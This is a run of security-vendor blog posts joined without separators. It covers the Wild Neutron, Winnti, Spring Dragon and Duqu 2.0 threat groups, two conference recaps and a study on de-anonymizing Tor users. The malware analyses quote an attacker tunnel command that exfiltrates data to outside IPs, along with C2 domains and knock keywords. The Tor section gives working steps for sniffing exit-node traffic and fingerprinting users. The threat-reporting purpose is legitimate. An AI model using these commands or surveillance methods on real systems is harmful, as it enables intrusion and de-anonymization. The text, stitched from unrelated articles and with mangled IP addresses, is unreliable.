Backdoors used in 2014 and 2015 attacks:MD5 Timestamp Version Filename Size 95ffe4ab4b158602917dd2a999a8caf8 13 Dec 2013 14014 LiveUpdater.exe 302592 342887a7ec6b9f709adcb81fef0d30a3 20 Jun 2014 15013 FlashUtil.exe 302592 dee8297785b70f490cc00c0763e31b69 02 Aug 2013
(possibly fake) 16010 IgfxUpt.exe 291328 f0fff29391e7c2e7b13eb4a806276a84 27 Oct 2014 16017 RtlUpd.exe 253952
The installers also have a version number, which indicates the following evolution:MD5 Timestamp Version 1f5f5db7b15fe672e8db091d9a291df0 16 Dec 2011 1.4.1 48319e9166cda8f605f9dce36f115bc8 28 Sep 2012 1.5.0 088472f712d1491783bbad87bcc17c48 12 Apr 2013 1.6.3 ee24a7ad8d137e54b854095188de0bbf 07 Jan 2014 1.6.4 Lateral movement
After installing the main backdoor and establishing initial C2 communication, the attackers use a range of different tools to extract sensitive data and control the victim’s machine. These tools include a password harvesting trojan, a reverse-shell backdoor and customized implementations of OpenSSH, WMIC and SMB. Sometimes, they only drop a simple perl reverse shell and use various collection methods to retrieve credentials from a set of machines, escalate privileges, and fan out across a network from there. Besides these tools, there is also a number of small utility modules of different functionalities, from loaders and configuration tools, to file shredders and network proxies.
It’s also worth noting that this threat actor heavily relies on already existing code, using publicly available open source applications, as well as Metasploit tools and leaked malware sources, to build its own toolset. Some of these tools are designed to work under Cygwin and come together with the Cygwin API DLL, which may suggest that the attackers feel more comfortable when working in a Linux-like environment.SSH tunnel backdoor
During the 2014/2015 attacks, we observed the attackers deploying custom, OpenSSH-based Win32 tunnel backdoors that are used to exfiltrate large amounts of data in a reliable manner. These tunnel backdoors are written as “updt.dat” and executed with two parameters, -z and -p. These specify the IP to connect to and the port. Despite the port number 443, the connection is SSH:
- /d /u /c updt.dat -z 184.108.40.206 -p 443
- /d /u /c updt.dat -z 220.127.116.11 -p 443
- /d /u /c updt.dat -z 18.104.22.168 -p 443
For authentication, the SSH tunnel backdoor contains a hardcoded RSA private key.Stolen certificate
During the 2015 attacks, Wild Neutron used a dropper signed with a stolen, yet valid Acer Incorporated certificate.
Acer signature on Wild Neutron dropper
The abused certificate has the following properties:
Serial: 5c c5 3b a3 e8 31 a7 df dc 7c 28 d5 15 8f c3 80
Thumbprint: 0d 85 91 41 ee 9a 0c 6e 72 5f fe 6b cf c9 9f 3e fc c3 fc 07
The dropper (dbb0ea0436f70f2a178a60c4d8b791b3) appears to have been signed on June 15, 2015. It drops a Jripbot backdoor as “IgfxUpt.exe” and configures it to use the C&C “app.cloudprotect[.]eu”.
#WildNeutron used a dropper signed with a stolen, yet valid Acer Incorporated certificateTweet
We have contacted Verisign and requested revocation of the certificate.Victims and statistics
The Wild Neutron attacks appear to have a highly targeted nature. During our investigation, we have been able to identify several victims across 11 countries:
- United States
The victims for the 2014-2015 versions are generally IT and real estate/investment companies and in both cases, a small number of computers have been infected throughout the organizations. The attackers appear to have updated the malware implant and deployed some additional tools, however, we haven’t observed serious lateral movement in these cases.Attribution
The targeting of various companies, without a government focus, makes us believe this is not a nation state sponsored APT. The attackers have also shown an interest in investment related targets, which indicate knowledge and skills to exploit such information on the market to turn it into financial advantages.
In some of the samples, the encrypted configuration includes a Romanian language string #WildNeutronTweet
In some of the samples, the encrypted configuration includes a Romanian language string, which is used to mark the end of the C&C communication:
Interestingly, “La revedere” means “goodbye” in Romanian. In addition to that, we found another non-English string which is the latin transcription of the russian word Успешно (“uspeshno” -> “successfully”); this string is written to a pipe after executing a C2 command.
We found another non-English string which is the latin transcription of the russian word #WildNeutronTweet
One of the samples has an internal name of “WinRAT-Win32-Release.exe”. This seems to indicate the authors are calling the malware “WinRAT”.
More information about the Wild Neutron attribution is available to Kaspersky Intelligence Services customers. Contact: firstname.lastname@example.orgConclusions
Compared to other APT groups, Wild Neutron is one of the most unusual ones we’ve analysed and tracked. Active since 2011, the group has been using at least one zero-day exploit, custom malware and tools and managed to keep a relatively solid opsec which so far eluded most attribution efforts. Their targeting of major IT companies, spyware developers (FlexiSPY), jihadist forums (the “Ansar Al-Mujahideen English Forum”) and Bitcoin companies indicate a flexible yet unusual mindset and interests.
Some of group’s distinctive features include:
- Use of open source tools and leaked sources of other malware
- Use of stolen certificate from Acer Incorporated to sign malware
- Use of cross platform zero-day exploit (Java and Flash) followed by cross platform payload reverse shell (Perl) for initial penetration
- Use of *NIX code ported to Windows through Cygwin
- Heavy use of SSH for exfiltration, a commonly used *NIX administration tool
- Use of CryptProtectData API to keep C&C URLs secret
- Simple command line interface, built around all malware components, utilizing named pipes for communication between modules;
- Auxiliary tools are written in C and most of them contain a built-in help, which may be printed by executing the binary with a “–pleh” parameter
We continue to track the Wild Neutron group, which is still active as of June 2015.
Kaspersky products detect the malware used in the attacks as:
HEUR:Trojan.Win32.WildNeutron.gen, Trojan.Win32.WildNeutron.*, Trojan.Win32.JripBot.*, HEUR:Trojan.Win32.Generic
%APPDATA%\Roaming\sqlite3.dll (UPX packed)
C:\Program Files (x86)\LNVSuite\LnrAuth.dll
C:\Program Files (x86)\LNVSuite\LnrAuthSvc.dll
C:\Program Files (x86)\LNVSuite\LnrUpdt.exe
C:\Program Files (x86)\LNVSuite\LnrUpdtP.exe
I got back from REcon 2015 a week ago and I’m well and truly over the jet lag at last. As usual, it was a great conference with many interesting talks and people. It is always great to meet other reverse engineers from all over the world and discuss new techniques, tools and research.
Tradition dictates that the event starts with training sessions, and I gave my usual four-day training on malware reverse engineering. During that time we covered all sorts of topics such as how to unpack/decrypt malware, analyze APT and so on.
I even got an award to mark 10 years of teaching Reverse Engineering class at REcon. Time flies
The conference was great. There were several interesting talks, more or less related to malware research. Here are the summaries of a few of them:
Introducing Dynamic IDA Enrichment framework (a.k.a DIE):
DIE is a new Hex-Rays IDA plugin that crosses the static-dynamic gap directly into the native IDA GUI. It gives researchers access to runtime values from within their standard disassembler screen.
As opposed to previous projects with similar goals, DIE takes a different approach by using an extensive plugin framework which allows the community to constantly add logic in order to better analyze and optimize the retrieved runtime values.
With a click of a button, everything is accessible to the researcher: he can inspect handles passed to a function, analyze injected code or runtime strings, enumerate dynamic structures, follow indirect function calls and more.
After the framework was explained, 3 live demos showed how to use the tool.
This presentation covered research done into the AnimalFarm operation as well as technical details of their various pieces of malware. The presentation also highlighted connections between samples as well as technical hints found regarding attribution.
Based on a paper that proves that the “mov” instruction is Turing complete, the M/o/Vfuscator takes the source code and compiles it into a program that uses *only* mov instructions – no comparisons, no jumps, no math (and definitely no SMC cheating).
The talk demonstrated how it is possible to write programs with only mov instructions as a way to obfuscate code. I asked the author of the presentation to make a crackme using the obfuscator, which he kindly made.
Other interesting talks included:
- This Time Font can hunt you down in 4 bytes
- Hooking Nirvana
- One font vulnerability to rule them all
- Reversing the Nintendo 64 CIC
You can find the full conference schedule at http://recon.cx/2015/schedule/
Slides and the videos from every talk will be uploaded soon on the REcon website.
See you next year at REcon 2016!
The past Saturday we had the privilege of participating in this year’s edition of “Nuit du Hack”, a French security conference which brings together professionals and amateurs of all skill levels for a series of lectures and challenges. It’s a full day (and night) of hacking goodness. A cloudy day set the perfect mood at the venue, the Academie Fratellini, in the marvelous and beautiful city of Paris.
With an interesting mix of security talks, capture the flag challenges, bug bounty programs, and workshops, the audience was welcome to join in any activities they chose. It was a security professional’s vision of heaven: learning about the latest security trends and issues while enjoying a beer and even getting a glimpse of the legendary Captain Crunch walking around. It’s also a great place for people of all ages and backgrounds to get involved.
The event started at full throttle with a memorable keynote from the director of ANSSI (National Agency for the Security of Information Systems) Guillaume Poupard, who spoke about local cyber security risks such as industrial espionage, electronic warfare and infrastructure sabotage. Moreover, he emphasized the importance of maintaining a balance between security and legality, an ethical dilemma that many security practitioners are facing right now in their daily activities.
The content of the talks was undoubtedly varied, including some that were more technically oriented, while others focused exclusively on the analysis of current security trends, malware and vulnerabilities.
David Melendez spoke about how he was able to build drone control system from scratch, basing his architecture and design on a GNU/Linux OS. Using a regular home Wi-Fi router and conventional hardware materials such as Wii accelerometer, he demonstrated a plausible way to control the drone’s flight using nothing more than an everyday gaming joystick. By sending commands and establishing a secure communication channel between the drone and the pilot, he successfully implemented a new protocol based on the 802.11 standard so as to prevent man-in-the-middle attacks.
The Internet of Things (IoT) is a topic that cannot be ignored any security event. With a very interesting approach, Guillaume Greyhound put on the table a hypothetical scenario about what would happen if some disaster were to damage the current technological infrastructure of a country. How could we face the impending chaos?
Faced with this situation, he exposed how IoT technologies can play a very important role in the implementing low-cost solutions that rely, for example, on Raspberry Pi devices or custom built drones and antennae to maintain a backup communication network that can ensure the exchange of goods and services.
Afterwards, Karsten Nohl introduced us to the world of mobile communication vulnerabilities. Showing a wide array of different technologies and mobile communication protocols such as SS7 and 3G, and how these can be compromised, he grabbed the audience’s attention right from the start. The presentation made it clear that the basic security level for mobile networks is not the same in every country around the world, he explained that some regions are evidently more exposed to intervention and eavesdropping. He also shared some specific tools to evaluate a network’s security, asking attendees to join him in his effort to protect free speech and the privacy of every individual that uses this type of communication (everyone). Interestingly, he also showed some solutions to defend against such attacks, once again highlighting the importance of protecting and defending privacy in digital communications.
My colleague Santiago Pontiroli and I presented our joint research into the evolution of .NET and PowerShell malware, which we titled “The TAO of .NET and PowerShell Malware analysis”. In our talk, Santi showed how malware development on .NET and PowerShell has increased more than 6,000% since 2009 (unique detections), all while presenting a detailed analysis several samples built with these technologies. Everything from devious ransomware campaigns such CoinVault to more complex and persistent threats used by pro-government Syrian hacking groups was shown to the audience.
From my side, I shared another side of the seemingly benevolent PowerShell, demonstrating its powerful incident response and forensics capabilities for us security researchers, and how malware developers are using these same methods for anti-forensics and code protection. As they seek to avoid detection and extend a particular piece of malware’s functionality in post exploitation activities, a plethora of offensive frameworks depending on PowerShell are amongst the bad guys’ favorite weapons of choice.
In addition, I tried to explain how malware developers could be using different penetration testing frameworks as a way to develop malware more rapidly. Certainly, we have found enough evidence in a considerable amount of malware samples showing the usage of SET and other offensive frameworks in the development of everyday malware and APTs, such as the case with the previously reported Machete.
I raised a question with the crowd, asking about the risks involved in the growing trend of cross-platform software development… Will the ability of running a piece of software between different platforms easily enable cybercriminals to create the ultimate multi-platform malware?
In summary, this was a great event with exceptionally exciting talks and very interesting with professionals from all over the world (having Captain Crunch there was an added bonus). As they say…we’ll always have Paris. And Nuit du Hack, of course.
For a long time the Winnti group had been considered as a Chinese threat actor targeting gaming companies specifically. But we’ve seen information indicating that the scope of targets can be wider and is not limited to the entertainment business. We track samples of Winnti malware all the time, but had not been able to catch one with solid clues indicating other targeted industries. Also our visibility as a vendor does not cover every company in the world (at least so far ;)) and the Kaspersky Security Network (KSN) did not reveal other attacks except those against gaming companies. Well, sometimes targeted entities have been telecommunication companies, rather large holdings, but at least one of their businesses was in some way related to the production or distribution of computer games.
In April Novetta released its report on Winnti malware spotted in the operations of Axiom group. And Axiom group has been presented as a Chinese universal hacking actor carrying out espionage APT attacks against a whole range of different industries. So this report was another source of intelligence that Winnti was already not focused just on online games. Finally, we received a sample proving this.
The sample belongs to one of the Winnti versions described in Novetta’s report – Winnti 3.0. This is one of the Dynamic Link Libraries composing this RAT (Remote Access Trojan) platform – the worker library (which in essence is the RAT DLL) with the internal name w64.dll and the exported functions work_end and work_start. Since, as usual, this component is stored on the disk with the strings and much of other data in the PE header removed/zeroed, it is impossible to restore the compilation date of this DLL. But this library includes two drivers compiled on August 22 and September 4 2014. The sample has an encrypted configuration block placed in overlay. This block may include a tag for the sample – usually it is a campaign ID or victim ID/name. This time the operators put such tag in the configuration and it turned out to be the name of the well-known global pharmaceutical company headquartered in Europe:
Besides the sample tag, the configuration block includes the names of other files involved in the working of the RAT platform and the service name (Adobe Service), after which malware is installed. The presence of the following files could indicate that the system has been compromised:
One of the mentioned drivers (a known, malicious Winnti network rootkit) was signed with a stolen certificate of a division of a huge Japanese conglomerate. Although this division is involved in microelectronics manufacturing, other business directions of the conglomerate include development and production of drugs and medicine equipment as well.
Although the nature of the involvement of Winnti operators, who were earlier perceived to be a threat only to the online gaming industry, in the activities of other cyber-espionage teams still remains rather obscure, the evidence is there. From now on, when you see Winnti mentioned, don’t think just about gaming companies; consider also at least targeted telecoms and big pharma.
Here are the samples in question:
8e61219b18d36748ce956099277cc29b – Backdoor.Win64.Winnti.gy
5979cf5018c03be2524b87b7dda64a1a – Backdoor.Win64.Winnti.gf
ac9b247691b1036a1cdb4aaf37bea97f – Rootkit.Win64.Winnti.ai
Unlike conventional World Wide Web technologies, the Tor Darknet onion routing technologies give users a real chance to remain anonymous. Many users have jumped at this chance – some did so to protect themselves or out of curiosity, while others developed a false sense of impunity, and saw an opportunity to do clandestine business anonymously: selling banned goods, distributing illegal content, etc. However, further developments, such as the detention of the maker of the Silk Road site, have conclusively demonstrated that these businesses were less anonymous than most assumed.
Intelligence services have not disclosed any technical details of how they detained cybercriminals who created Tor sites to distribute illegal goods; in particular, they are not giving any clues how they identify cybercriminals who act anonymously. This may mean that the implementation of the Tor Darknet contains some vulnerabilities and/or configuration defects that make it possible to unmask any Tor user. In this research, we will present practical examples to demonstrate how Tor users may lose their anonymity and will draw conclusions from those examples.How are Tor users pinned down?
The history of the Tor Darknet has seen many attempts – theoretical and practical – to identify anonymous users. All of them can be conditionally divided into two groups: attacks on the client’s side (the browser), and attacks on the connection.Problems in Web Browsers
The leaked NSA documents tell us that intelligence services have no qualms about using exploits to Firefox, which was the basis for Tor Browser. However, as the NSA reports in its presentation, using vulnerability exploitation tools does not allow permanent surveillance over Darknet users. Exploits have a very short life cycle, so at a specific moment of time there are different versions of the browser, some containing a specific vulnerability and other not. This enables surveillance over only a very narrow spectrum of users.
The leaked NSA documents, including a review of how Tor users can be de-anonymized (Source: www.theguardian.com)
As well as these pseudo-official documents, the Tor community is also aware of other more interesting and ingenuous attacks on the client side. For instance, researchers from the Massachusetts Institute of Technology established that Flash creates a dedicated communication channel to the cybercriminal’s special server, which captures the client’s real IP address, and totally discredits the victim. However, Tor Browser’s developers reacted promptly to this problem by excluding Flash content handlers from their product.
Flash as a way to find out the victim’s real IP address (Source: http://web.mit.edu)
Another more recent method of compromising a web browser is implemented using the WebRTC DLL. This DLL is designed to arrange a video stream transmission channel supporting HTML5, and, similarly to the Flash channel described above, it used to enable the victim’s real IP address to be established. WebRTC’s so-called STUN requests are sent in plain text, thus bypassing Tor and all the ensuing consequences. However, this “shortcoming” was also promptly rectified by Tor Browser developers, so now the browser blocks WebRTC by default.Attacks on the communication channel
Unlike browser attacks, attacks on the channel between the Tor client and a server located within or outside of the Darknet seem unconvincing. So far most of the concepts were presented by researchers in laboratory conditions and no ‘in-the-field’ proofs of concept have been yet presented.
Among these theoretical works, one fundamental text deserve a special mention – it is based on analyzing traffic employing the NetFlow protocol. The authors of the research believe that the attacker side is capable of analyzing NetFlow records on routers that are direct Tor nodes or are located near them. A NetFlow record contains the following information:
- Protocol version number;
- Record number;
- Inbound and outgoing network interface;
- Time of stream head and stream end;
- Number of bytes and packets in the stream;
- Address of source and destination;
- Port of source and destination;
- IP protocol number;
- The value of Type of Service;
- All flags observed during TCP connections;
- Gatway address;
- Masks of source and destination subnets.
In practical terms all of these identify the client.
De-anonymizing a Tor client based on traffic analysis
This kind of traffic analysis-based investigation requires a huge number of points of presence within Tor, if the attacker wants to be able to de-anonymize any user at any period of time. For this reason, these studies are of no practical interest to individual researchers unless they have a huge pool of computing resources. Also for this reason, we will take a different tack, and consider more practical methods of analyzing a Tor user’s activity.Passive monitoring system
Every resident of the network can share his/her computing resources to arrange a Node server. A Node server is a nodal element in the Tor network that plays the role of an intermediary in a network client’s information traffic. In this Darknet, there several types of nodes: relay nodes and exit nodes. An exit node is an end link in traffic decryption operation, so they are an end point which may become the source of leaking interesting information.
Our task is very specific: we need to collect existing and, most importantly, relevant onion resources. We cannot solely rely on internal search engines and/or website catalogs, as these leave much to be required in terms of the relevance and completeness of contained information.
However, there is a straightforward solution to the problem of aggregation of relevant websites. To make a list of the onion resources that were recently visited by a Darknet user, one needs to track each instance of accessing them. As we know, an exit node is the end point of the path that encrypted packets follow within the Darknet, so we can freely intercept HTTP/HTTPS protocol packets at the moment when they are decrypted at the exit node. In other words, if the user uses the Darknet as an intermediary between his/her browser and a web resource located in the regular Internet, then Tor’s exit node is the location where packets travel in unencrypted format and can be intercepted.
We know that an HTTP packet may contain information about web resources, including onion resources that were visited earlier. This data is contained in the ‘Referrer’ request header, which may contain the URL address of the source of the request. In the regular Internet, this information helps web masters determine which search engine requests or sites direct users towards the web resource they manage.
In our case, it is enough to scan the dump of intercepted traffic with a regular expression containing the string ‘onion’.
There is a multitude of articles available on configuring exit nodes, so we will not spend time on how to configure an exit node, but instead point out a few details.
First of all, it is necessary to set an Exit Policy that allows traffic communication across all ports; this should be done in the configuration file torrc, located in the Tor installation catalog. This configuration is not a silver bullet but it does offer a chance of seeing something interesting at a non-trivial port.
>> ExitPolicy accept *:*
The field ‘Nickname’ in the torrc file does not have any special meaning to it, so the only recommendation in this case is not to use any conspicuous (e.g. ‘WeAreCapturingYourTraffic’) node names or those containing numbers (‘NodeNumber3′) that might suggest an entire network of such nodes.
After launching a Tor server, it is necessary to wait until it uploads its coordinates to the server of directories – this will help our node declare itself to all Darknet participants.
An exit node in operation
After we launched the exit mode and it began to pass Tor users’ traffic through itself, we need to launch a traffic packet sniffer and intercept the passing traffic. In this case, tshark acts as a sniffer, listening to interface #1 (occupied by Tor) and putting the dump into the file ‘dump.pcap':
>>tshark –i 1 –w dump.pcap
Tshark intercepts packets that pass through the exit node in unencrypted format
All the above actions must be done on as many servers as possible to collect as much information of interest as possible. It should be noted that the dump grows quite quickly, and it should be regularly collected for analysis.
Thus, once you receive a huge dump, it should be analyzed for onion resources. Skimming through the dump helps to categorize all resources visited by Tor users by content type.
It should be noted that 24 hours of uninterrupted traffic interception (on a weekday) produce up to 3GB of dump for a single node. Thus, it cannot be simply opened with Wireshark – it won’t be able to process it. To analyze the dump, it must be broken into smaller files, no larger than 200 MB (this value was determined empirically). To do so, the utility ‘editcamp’ is used alongside with Wireshark:
>> editcap – c 200000 input.pcap output.pcap
In this case, 200,000 represents the number of packets in a single file.
While analyzing a dump, the task is to search for strings containing the substring “.onion”. This very likely will find Tor’s internal resources. However, such passive monitoring does not enable us to de-anonymize a user in the full sense of the word, because the researcher can only analyze those data network packets that the users make available ‘of their own will’.Active monitoring system
To find out more about a Darknet denizen we need to provoke them into giving away some data about their environment. In other words, we need an active data collection system.
An expert at Leviathan Security discovered a multitude of exit nodes and presented a vivid example of an active monitoring system at work in the field. The nodes were different from other exit nodes in that they injected malicious code into that binary files passing through them. While the client downloaded a file from the Internet, using Tor to preserve anonymity, the malicious exit node conducted a MITM-attack and planted malicious code into the binary file being downloaded.
This incident is a good illustration of the concept of an active monitoring system; however, it is also a good illustration of its flipside: any activity at an exit node (such as traffic manipulation) is quickly and easily identified by automatic tools, and the node is promptly blacklisted by the Tor community.Let’s start over with a clean slate
- Various graphics drivers and hardware components installed on the client’s side;
- Various sets of software in the operating system and various configurations of the software environment.
The parameters of rendered images can uniquely identify a web-browser and its software and hardware environment. Based on this peculiarity, a so-called fingerprint can be created. This technique is not new – it is used, for instance, by some online advertising agencies to track users’ interests. However, not all of its methods can be implemented in Tor Browser. For example, supercookies cannot be used in Tor Browser, Flash and Java is disabled by default, font use is restricted. Some other methods display notifications that may alert the user.
Thus, our first attempts at canvas fingerprinting with the help of the getImageData()function that extracts image data, were blocked by Tor Browser:
However, some loopholes are still open at this moment, with which fingerprinting in Tor can be done without inducing notifications.By their fonts we shall know them
Tor Browser can be identified with the help of the measureText()function, which measures the width of a text rendered in canvas:
Using measureText() to measure a font size that is unique to the operating system
If the resulting font width has a unique value (it is sometimes a floating point value), then we can identify the browser, including Tor Browser. We acknowledge that in some cases the resulting font width values may be the same for different users.
It should be noted that this is not the only function that can acquire unique values. Another such function is getBoundingClientRect(),which can acquire the height and the width of the text border rectangle.
When the problem of fingerprinting users became known to the community (it is also relevant to Tor Browser users), an appropriate request was created. However, Tor Browser developers are in no haste to patch this drawback in the configuration, stating that blacklisting such functions is ineffective.
Tor developer’s official reply to the font rendering problemField trials
This approach was applied by a researcher nicknamed “KOLANICH”. Using both functions, measureText() and getBoundingClientRect(), he wrote a script, tested in locally in different browsers and obtained unique identifiers.
Using the same methodology, we arranged a test bed, aiming at fingerprinting Tor Browser in various software and hardware environments.
A fragment of a web-server’s log with a visible Tor Browser fingerprint
At this time, we are collecting the results of this script operating. To date, all the returned values are unique. We will publish a report about the results in due course.Possible practical implications
- Internal onion resources and external web sites controlled by the attackers. For example, an attacker launches a ‘doorway’, or a web page specially crafted with a specific audience in view, and fingerprints all visitors.
- Internal and external websites that are vulnerable to cross-site scripting (XSS) vulnerabilities (preferably stored XSS, but this is not essential).
Objects that could fingerprint a Tor user
The last item is especially interesting. We have scanned about 100 onion resources for web vulnerabilities (these resources were in the logs of the passive monitoring system) and filtered out ‘false positives’. Thus, we have discovered that about 30% of analyzed Darknet resources are vulnerable to cross-site scripting attacks.
The process of de-anonymizing a Tor user
Following this approach, the attacker could, in theory, find out, for instance, sites on which topics are of interest to the user with the unique fingerprint ‘c2c91d5b3c4fecd9109afe0e’, and on which sites that user logs in. As a result, the attacker knows the user’s profile on a web resource, and the user’s surfing history.In place of a conclusion
Let’s examine a couple of interesting delivery techniques from an APT active for the past several years, the Spring Dragon APT. A paper released today by our colleagues at Palo Alto Networks presented a portion of data on this crew under the label “the Lotus Blossom Operation“, likely named for the debug string present in much of the “Elise” codebase since at least 2012: “d:\lstudio\projects\lotus\…”.
The group’s capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years. Instead, the group is known to have employed half day spearphish exploits, strategic web compromises, and watering holes employing fake Flash player update re-directions. The group’s spearphish toolset includes PDF exploits, Adobe Flash Player exploits, and the common CVE-2012-0158 Word exploits including those generated from the infamous “Tran Duy Linh” kit. While ongoing attacks by the Spring Dragon APT take us back to a focus on Vietnam, they appear to have rolled out a steady mix of exploits against defense subcontractors around the world and government related organizations in VN, TW, PH, and other locations over the past few years. Let’s take a quick look at a couple more examples of their intrusion capabilities that haven’t been mentioned elsewhere.
Organizations located in Myanmar and targeted by Spring Dragon have gone unmentioned. But Spring Dragon’s infiltration techniques there were not simply 0158 spearphish, they also compromised sites. In one case, they replaced specialized font installers needed to render Myanma font. You can see an image here of the “Planet Myanmar” website in late 2012 distributing such a package. All of the zip links were redirected to a poisoned installer zip file. The download name was “Zawgyi_Keyboard_L.zip”, and it dropped a “setup.exe” that contained several backdoor components, including an Elise “wincex.dll” (a42c966e26f3577534d03248551232f3, detected as Backdoor.Win32.Agent.delp). It beacons out with the typical Elise GET request “GET /%x/page_%02d%02d%02d%02d.html”, as documented in the Lotus Blossom paper.
Another APT later abused this exact site to deliver malicious VBS (CVE-2014-6332) exploits in November of 2014 with a Lurid variant payload. And that same group also served a malicious PDF exploit (CVE-2010-2883) from this site in June 2012 as “Zawgyi Unicode Keyboard.pdf”. Even earlier than that, they spearphished with that same PDF exploit object later hosted on the website under different file names. In November 2011, they used filenames appropriate for their spearphishing targets with this exploit like “台灣安保協會「亞太區域安全與台海和平」國際研討會邀 請 函_20110907.pdf” (“Taiwan Security Association International Seminar Invitation – the Asia-Pacific regional security and peace in the Taiwan Strait”), “china-central_asia.pdf”, “hydroelectric sector.pdf”, and various governmental related proposals. In this case, there was unexpected overlap from two APT.
Another interesting technique that we observed in use against government targets was a campaign that lured recipients to a site redirecting users to a spoofed Flash installer site.
This site in turn redirected users to a Flash installer bundled with the common Elise backdoor, eventually communicating with 22.214.171.124 and its usual “GET /14111121/page_321111234.html HTTP/1.0″.
hxxp://www.bkav2010.net/support/flashplayer/downloads.html → redirected to
While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past, Spring Dragon employs more involved and creative intrusive activity as well.
We have previously described how Duqu 2.0 doesn’t have a normal “persistence” mechanism. This can lead users to conclude that flushing out the malware is as simple as rebooting all the infected machines. In reality, things are a bit more complicated.
The attackers created an unusual persistence module which they deploy on compromised networks. It serves a double function – it also supports a hidden C&C communication scheme. This organization-level persistence is achieved by a driver that is installed as a normal system service. On 64-bit systems, this implies a strict requirement for an Authenticode digital signature. We have seen two such persistence drivers deployed in the course of attacks.
During their operations the Duqu threat actors install these malicious drivers on firewalls, gateways or any other servers that have direct Internet access on one side and corporate network access on other side. By using them, they can achieve several goals at a time: access internal infrastructure from the Internet, avoid log records in corporate proxy servers and maintain a form of persistence after all.
In essence, the drivers are redirecting network streams to and from the gateway machine that runs it. To forward connections, the attacker first has to pass a network-based “knocking” mechanism by using a secret keyword. We have seen two different secret keywords in the samples we collected so far: “romanian.antihacker” and “ugly.gorilla”.
We described one of these drivers in our whitepaper about Duqu 2.0 (see “The ”portserv.sys” driver analysis” section). Let us repeat some of the most important details. The driver listens to the network and expects a special secret keyword (“romanian.antihacker” in that case). After that, it saves IP of the host that passed the correct secret keyword and starts redirecting all packets from port 443 to 445 (SMB) or 3389 (Remote Desktop) of that server. This effectively allows the attackers to tunnel SMB (i.e. remote file system access) and Remote Desktop through the gateway server while making it look like HTTPS traffic (port 443).
In addition to the “romanian.antihacker” driver, we have discovered another one which did a similar job, however, supporting more connections in a more generic way:
- If the driver recognizes the secret keyword “ugly.gorilla1” then all traffic from the attacker’s IP will be redirected from port 443 (HTTPS) to 445 (SMB)
- If the driver recognizes the secret keyword “ugly.gorilla2” then all traffic from the attacker’s IP will be redirected from port 443 (HTTPS) to 3389 (RDP)
- If the driver recognizes the secret keyword “ugly.gorilla3” then all traffic from the attacker’s IP will be redirected from port 443 (HTTPS) to 135 (RPC)
- If the driver recognizes the secret keyword “ugly.gorilla4” then all traffic from the attacker’s IP will be redirected from port 443 (HTTPS) to 139 (NETBIOS)
- If the driver recognizes the secret keyword “ugly.gorilla5” then all traffic from the attacker’s IP will be redirected from port 1723 (PPTP) to 445 (SMB)
- If the driver recognizes the secret keyword “ugly.gorilla6” then all traffic from the attacker’s IP will be redirected from port 443 (HTTPS) to 47012 (currently unknown).
We would like to note that one port here looks quite suspicious: 47012. So far, we haven’t seen any other Duqu 2.0 components using this port, nor have we found any other common malware, backdoor or legitimate software using this port (also according to SANS). However, considering that this port number was hardcoded into the malware this may be a good indicator of compromise for Duqu 2.0.
Part of the malware with array of secret keywords
This 64-bit driver contains an internal DLL name, “termport.sys”, while the filename in the filesystem was “portserv.sys”. This most likely means that the attackers change filenames for different operations and detection of this attack should not solely rely on names of the files. The compilation timestamp is apparently fake here: “Jul 23 18:14:28 2004”. All the discovered driver files were located in “C:\Windows\System32\drivers\”.
Perhaps the most important part of this attack strategy is the digital signature used for the 64-bit driver. Because this is a mandatory requirement on 64-bit Windows systems, the driver had a valid digital signature. It was signed by “HON HAI PRECISION INDUSTRY CO. LTD.” (also known as “Foxconn Technology Group”, one of the world’s largest electronics manufacturers).
Digital signature of attacker’s driver
According to the information from the driver it was signed at 20:31 on 19.02.2015. Below are some more details provided by SysInternal’s sigcheck utility:Verified: Signed
Signing date: 20:31 19.02.2015
Publisher: HON HAI PRECISION INDUSTRY CO. LTD.
Description: Port Optimizer for Terminal Server
Product: Microsoft Windows Operating System
Prod version: 6.1.7601
File version: 6.1.7601 built by: WinDDK
According to Wikipedia “Foxconn Technology Group” is the world’s largest electronics contract manufacturer and is headquartered in Tucheng, New Taipei, Taiwan.
Major customers of Foxconn include or have included some of the world’s largest enterprises:
- Acer Inc.
- Apple Inc.
- BlackBerry Ltd.
- Motorola Mobility
Foxconn manufactures several popular https://en.wikipedia.org/wiki/Foxconn products including BlackBerry, iPad, iPhone, Kindle, PlayStation 4, Xbox One and Wii U.
The same certificate was used by the manufacturer to sign several WatchDog Timer Kernel drivers (WDTKernel.sys) for Dell laptops in February 2013.Conclusions
During our previous research into Stuxnet and Duqu we have observed digitally signed malware (using malicious Jmicron and Realtek certs). Stealing digital certificates and signing malware on behalf of legitimate businesses seems to be a regular trick from the Duqu attackers. We have no confirmation that any of these vendors have been compromised but our indicators definitely show that the Duqu attackers have a major interest in hardware manufacturers such as Foxconn, Realtek and Jmicron. This was confirmed in the 2014/2015 attacks, when we observed infections associated with hardware manufacturers from APAC, including ICS and SCADA computer equipment manufacturers.
Another interesting observation is that besides these Duqu drivers we haven’t uncovered any other malware signed with the same certificates. That rules out the possibility that the certificates have been leaked and are being used by multiple groups. It also seems to indicate the Duqu attackers are the only ones who have access to these certificates, which strengthens the theory they hacked the hardware manufacturers in order to get these certificates.
Finally, it’s interesting that the Duqu attackers are also careful enough not to use same digital certificate twice. This is something we have seen with Duqu from both 2011 and 2015. If that’s true, then it means that the attackers might have enough alternative stolen digital certificates from other manufacturers that are ready to be used during the next targeted attack. This would be extremely alarming because it effectively undermines trust in digital certificates.
Both Verisign and HON HAI have been informed about the use of the certificate to sign the Duqu 2.0 malware.IOC
Sample MD5 (portserv.sys): 92e724291056a5e30eca038ee637a23f
Serial number of Foxconn certificate used by Duqu attackers:
25 65 41 e2 04 61 90 33 f8 b0 9f 9e b7 c8 8e f8
Full certificate of the malicious driver:
Earlier this year, during a security sweep, Kaspersky Lab detected a cyber-intrusion affecting several of our internal systems.
Following this finding, we launched a large scale investigation, which led to the discovery of a new malware platform from one of the most skilled, mysterious and powerful groups in the APT world – Duqu. The Duqu threat actor went dark in 2012 and was believed to have stopped working on this project – until now. Our technical analysis indicates the new round of attacks include an updated version of the infamous 2011 Duqu malware, sometimes referred to as the stepbrother of Stuxnet. We named this new malware and its associated platform “Duqu 2.0”.
